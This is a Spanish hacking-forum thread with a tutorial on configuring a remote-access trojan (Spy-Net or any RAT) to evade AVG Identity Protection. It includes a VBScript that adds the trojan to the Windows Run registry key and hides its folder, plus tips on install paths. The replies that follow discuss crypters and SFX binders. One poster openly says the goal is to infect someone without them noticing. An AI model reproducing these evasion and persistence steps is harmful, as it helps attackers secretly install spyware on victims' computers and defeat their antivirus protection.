Bypass AVG Identity Protection [By geminis_demon]

AVG Identity Protection es un modulo que trae incorporado el AVG Antivirus 2011, tanto la versión gratuita como las de pago.

Como dice la descripción que veis en la imagen, este modulo lo que hace es analizar el comportamiento de los ejecutables en busca de movimientos sospechosos, eso significa que aunque vuestro server esté fud será detectado al ejecutarlo y posteriormente eliminado.

¿Y que hay que hacer para burlar esta protección? Pues configurar nuestro server de forma que no se comporte como un troyano.

Pondré el ejemplo con Spy-Net pero funciona con cualquier RAT. Para que funcione tenéis que dejar marcadas las opciones como las veis en la imagen:

Fijaros bien que en el directorio de instalación puse este signo: <
Eso es porque los direcctorios de instalación que hay para elegir son detectados por AVG como "Movimiento sospechoso", entonces, al poner ese signo que no está permitido en los nombres de carpetas, el server se instalará automaticamente en la carpeta %APPDATA%.

Ahora lo que aremos sera abrir el notepad y pegar este texto:


Código:
set indetectable = createobject("wscript.shell")
indetectable.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Ru n\PRUEBA" , "%APPDATA%\PRUEBA\PRUEBA.exe" , "REG_EXPAND_SZ"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta "attrib +r +s +h %APPDATA%\PRUEBA" , VbHide
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta "attrib +r +s +h %APPDATA%\PRUEBA\*.*" , VbHide

Y lo guardamos como "autoinicio.vbs". Este archivo lo hace es ocultar nuestro server y agregarlo al registro de windows para que se inicie con el sistema, ahora lo unimos al server así:

Y con esto conseguimos bypassear el AVG Identity Protection. 

NOTA: Donde pone "PRUEBA" podéis poner lo que queráis pero recordar que la carpeta donde se instala el server tendréis que ponerla también en el archivo .vbs

Saludos,, Cronos.-

Hice exactamente todo lo del tutorial, guarde mi server luego de eso lo encripte, y el encriptado funciona es decir al analizarlo normalmente no lo detecta pero al ejecutarlo, parece que funciona pero pasan 15 segundos y sale ese cartel...

El server de todas formas mas alla de que uno lo mueva a boveda con ese cartel sigue funcionando, pero lo que yo quiero es que no aparesca nada porque el que sabe, al toque si fija en procesos, pone terminar procesos y al no ser persistente el server ya lo logro borrar... por favor ayuda necesito pasar el avg ¬¬

Me tendrias que dar mas detalles... Tu server esta creado con las opciones que muestra el tuto? Y el crypter con el que lo encryptaste esta fud, o almenos no lo detecta AVG?

Sisi, es lo que decia hice el server con EXACTAMENTE, las mismas opciones de la pantalla, y el block de notas tambien ( ni si quiera le cambie el nombre "Prueba") y el crypter lo hice indetectable a varios AVS, entre ellos el avg, es por eso que si a mi server le doy click derecho, analizar con avg, no me detecta nada, solo me lo detecta pasados unos 8 o 10 segundos despues de haber ejecutado el server... y ahi es cuando me aparece el cartel de la imagen que anteriormente postie.


PD: el server logra alojarse mas alla de que yo le ponga mover a boveda (cuando aparece el cartel de mi captura de pantalla) pero lo que yo quiero es que sea algo sutil y que el otro ni se entere de que el archivo esta infectadandolo...

Nose tonces que puede fallar, una de esas lo han arreglado.. Este metodo es viejo ya..

Se debería abrir antes el vbs que el troyano así que lo podrías hacer con SFX Compiler. Y si así no funciona es que este método ya es antiguo y fue corregido.



Saludos

El metodo funciona, es decir el trojano llega a alojarse, pero lo que me detecta el AVG es el proceso que activa el troyano, osea probando lo del sfx compiler, pasa lo mismo, se instala, y el archivo no lo detecta pero pasados unos segundos detecta que hay un proceso el cual reconoce como una amenaza...


Este metodo me parece que ya es obsoleto, sino intentenlo ustedes mismos y me cuentan si a alguno le funciono...